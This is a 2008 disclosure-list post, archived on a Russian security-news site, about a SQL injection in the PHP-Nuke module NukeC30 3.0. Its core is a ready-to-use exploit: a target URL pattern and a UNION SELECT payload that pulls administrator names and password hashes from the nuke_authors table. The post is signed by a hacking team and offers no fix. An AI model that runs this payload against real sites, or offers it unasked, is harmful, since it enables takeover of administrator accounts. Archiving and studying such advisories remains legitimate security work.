Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Mambo Components ensenanzas "id" Remote SQL Injection

  [ GLSA 200803-18 ] Cacti: Multiple vulnerabilities

  [Full-disclosure] Advisory: SQL-Injections in Mapbender

  [Full-disclosure] Advisory: Remote Command Execution in Mapbender

From:houssamix_(at)_hotmail.fr <houssamix_(at)_hotmail.fr>
Date:11 марта 2008 г.
Subject:PHP-Nuke Module NukeC30 sql injection

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix from H-T Team
                         
= Script : PHP-Nuke Module NukeC30    
                  Module's Name: NukeC30
                  Module's Version: 3.0
                                       
= BUG : Remote SQL Injection  
 
= Exploit :                                                  
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL]

[SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),
2/**/from/**/nuke_authors/*where%20admin%20-2
               
= Greetz : All muslims HaCkers

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород